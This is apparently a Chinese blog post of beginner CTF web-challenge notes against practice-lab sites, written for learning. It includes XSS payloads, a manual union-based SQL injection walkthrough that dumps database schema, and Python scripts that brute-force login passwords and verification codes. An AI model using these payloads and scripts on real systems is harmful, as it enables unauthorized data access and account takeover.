CTF web总结(入门)
本文链接:http://blog.csdn.net/u012763794/article/details/50959166
本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我
仅作为自己的笔记及刚入门的童鞋,大牛勿喷
基础篇
1.直接查看源代码
2.修改或添加HTTP请求头
http://ctf1.shiyanbar.com/basic/header/
3.查看HTTP请求头或响应头
http://ctf1.shiyanbar.com/basic/catch/
4.302跳转的中转网页有信息
5.查看开发者工具控制台
6.javascript代码绕过
7.使用burp的repeater查看整个HTTP包
8.阅读javascript代码,直接控制台获取正确密码
9.robots.txt文件获取信息
10..bash_history,这个应该说看到过吧,就是记录用户输入过的linux命令的
前端脚本类
js加解密
XSS
- $.post("./getkey.php?ok=1",{'url':location.href,'ok':ok},function(data){
- console.log(data);
- });
- showkey();
当然简单的直接输入
- <script>alert(HackingLab)</script>
这样也可以
这题也差不多
http://lab1.xseclab.com/realxss2_bcedaba7e8618cdfb51178765060fc7d/index.php
- <img src="11" onerror=alert(HackingLab)>
http://lab1.xseclab.com/realxss3_9b28b0ff93d0b0099f5ac7f8bad3f368/index.php
后端脚本类
代码审计
asp代码审计:
php代码审计
表单隐藏 http://ctf10.shiyanbar.com:8888/main.php
sql注入
- //手工注入过程
- //判断注入类型为and布尔型注入
- http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=1
- http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2
- //判断字段数
- http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%203
- http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%202
- //获取数据库基本信息(//concat_ws是字符串连接函数,其中第一个参数是分隔符,CHAR(58)是冒号,因为冒号的ASCII是58)
- http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,concat_ws(CHAR(58),user(),database(),version())
- //获取数据库中的表,其中table_schema可以理解为数据库吧(他是mysql系统表里面的一个字段,这里我们用16进制表示,就是上一句查询到的数据库)
- http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x6d795f6462
- //获取重要表的字段
- http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name=0x746869736b6579
- //获取表中的内容
- http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,k0y from thiskey
payload
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%a0%27 or 1=1 limit 2,1%23
写点脚本的
- import requests
- import base64
- url='http://ctf4.shiyanbar.com/web/10.php'
- req=requests.get(url)
- print req.text
- key=req.headers['FLAG']
- key=base64.b64decode(key)
- key=key.split(':')[1].strip()
- data={'key':key}
- r=requests.post(url,data=data)
- print(r.text)
后台登陆型
代码逆向
- $cipher = 'a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws';
- $tmp = base64_decode(strrev(str_rot13($cipher)));
- echo $tmp;
- $b = '';
- for ($i=0; $i < strlen($tmp); $i++) {
- $a = substr($tmp, $i, 1);
- $b = $b.chr(ord($a)-1);
- }
- echo strrev($b);
上传绕过类
php的特性
- var_dump( 0 == "a" );
- var_dump( "0" == "a" );
第一个返回的是 true ,第二个返回的是 false
- var_dump("0e462097431906854"=="0e83040041");
上面这个返回true,如果题目的md5是0e开头的,你懂的
- md5('240610708') 的结果是:0e462097431906509019562988736854
- md5('QNKCDZO') 的结果是:0e830400451993494058024219903391
还有就是extract那个函数,也可以存在变量覆盖http://www.w3school.com.cn/php/func_array_extract.asp
6.ereg函数漏洞:00截断
%00
备份文件类型的
.bak ultroedit....
~
.xxxx.PHP.swp .xxxx.php.swo vim
验证码类的
- import requests
- url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
- req = requests.session()
- header = {"Cookie":"PHPSESSID=9b8f8686269f5d70a44766e3c5f4dcdc"}
- for pwd in xrange(1000,10000):
- data={'username':'admin','pwd':pwd,'vcode':'c3pe'}
- ret = req.post(url, data=data, headers=header)
- print ret.text
- if 'error' not in ret.text:
- print pwd
- break
- import requests
- url = "http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"
- req = requests.session()
- header = {"Cookie":"PHPSESSID=3c39940da50b514038b3e9971ee5f57e"}
- for pwd in xrange(1000,10000):
- data={'username':'admin','pwd':pwd,'vcode':''}
- ret = req.post(url, data=data, headers=header)
- if 'error' not in ret.text:
- print ret.text
- print "good: password is:" + str(pwd)
- break
- else:
- print "try:" + str(pwd) + " and result is :"+ ret.text
- import requests
- url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"
- req = requests.session()
- header = {"Cookie":"PHPSESSID=61556a5b2a6c2a03a2f35b199cbb5364"}
- for vcode in xrange(100,1000):
- data={'username':'13388886666','vcode':vcode, 'Login':'submit'}
- # data={'username':'13399999999','vcode':vcode, 'Login':'submit'}
- ret = req.post(url, data=data, headers=header)
- if 'error' not in ret.text:
- print ret.text
- print "good: vcode is:" + str(vcode)
- break
- else:
- print "try:" + str(vcode) + " and result is :"+ ret.text
CTF web总结(入门)相关推荐
- 用burpsuite抓包,谷歌 / 火狐浏览器 该怎么设置BurpSuite代理?——超详细教程——CTF Web小白入门基础篇
以下是我自己操作过的,理一理思路. 使用BurpSuite的套路是:先浏览器设置BurpSuite代理-->BurpSuite 调至on状态-->访问web程序-->进行抓包分析 最 ...
- CTF Web入门 命令执行 笔记
CTF Web入门 命令执行 eval(读取命令),但各种字符被ban if(!pregmatch("...",$c)) #指过滤了...eval($c); 这时候可以尝试 ?c= ...
- ctf安全竞赛入门pdf_CTF安全竞赛入门
要问学习网络安全的小伙伴们最想快速提升的技能是啥,可能很多小伙伴都会选择CTF了! CTF是一种流行的信息安全竞赛形式,其英文名可直译为"夺得Flag",也可意译为"夺旗 ...
- CTF——web个人总结
CTF web个人总结 仅供个人参考 从0开始接触到了CTF,算是入门了,为了方便自己做题,现在记录一下web类型题目的解题思路. 目录 CTF web个人总结 工具(含后渗透) 解题思路 一.普通思 ...
- JSP WEB开发入门基础到高手进阶教程002
JSP WEB开发入门基础到高手进阶教程 -------开发入门 JSP与微软的Active Server Pages 兼容,但它是使用类似HTML的卷标以及Java程序代码段而不是VBScript. ...
- JAVA WEB快速入门之从编写一个JSP WEB网站了解JSP WEB网站的基本结构、调试、部署...
接上篇<JAVA WEB快速入门之环境搭建>,在完成了环境搭建后(JDK.Tomcat.IDE),现在是万事具备,就差写代码了,今天就来从编写一个JSP WEB网站了解JSP WEB网站的 ...
- 【python】 web开发入门
进入Web开发 现在你完成了Python忍者训练,准备深入Ptyhon的Web开发,但现在的问题是有很多的框架,从中选择最好的框架非常困难,但从初学者的角度出发,Flask基本Web框架将非常适合We ...
- Intellij Idea 创建Web项目入门(一)
原文:Intellij Idea 创建Web项目入门(一) 相关软件: Intellij Idea14:http://pan.baidu.com/s/1nu16VyD JDK7:http://pan. ...
- Jmeter Web 性能测试入门 (六):Jmeter 解析 response 并传递 value
解析response中的内容,并把获取到的value传递到后续的request中,常用的方法就是在想要解析response的request上添加后置处理器 本章介绍两种常用的组件 BeanShell ...
- java8生成jsp页面内容组装到jsp中_JAVA WEB快速入门之从编写一个JSP WEB网站了解JSP WEB网站的基本结构、调试、部署...
接上篇<JAVA WEB快速入门之环境搭建>,在完成了环境搭建后(JDK.Tomcat.IDE),现在是万事具备,就差写代码了,今天就来从编写一个JSP WEB网站了解JSP WEB网站的 ...
最新文章
- CS-APP:Section 5.1,Memory aliasing :看上去逻辑一样,执行结果一样吗?
- Gin实际编写中间件
- 公式 有效值_纯电阻电路电功率公式
- php的用户认证(有点难度 多看几遍吧)
- (37)System Verilog类外方法示例
- qml 不刷新 放大还原_【显示器选择详解】你的电脑能否带动高分辨率,高刷新率显示器?...
- 马斯洛需求的五个层次_运用马斯洛需求层次理论分析《吞噬星空》爽点之第九章...
- php store快捷键设置,mac 下 phpstorm 快捷键整理
- 【BP数据预测】基于matlab狼群算法优化BP神经网络数据预测【含Matlab源码 658期】
- appfuse mysql_学习 AppFuse
- stm32电容触摸按键的实现
- 十隔日推算法_年、月、日、时干支推算法
- 手机版服务器最新的,我的世界手机版服务器ip地址大全(持续更新)
- 按钮 蓝底白字 html,为什么ChemDraw Professional 15颜色设置总是蓝底白字?
- xcode 设置编码区背景颜色为淡绿色
- 【优化求解】基于NSGAII算法求解含约束多目标优化问题matlab代码
- IP-Guard如何注册
- 学生托管班_小学生上托管班弊大于利
- USNEWS美国大学计算机工程,想从事编程?2019年USNews美国大学计算机工程专业排名值得一看...
- Yau 近代几何讲座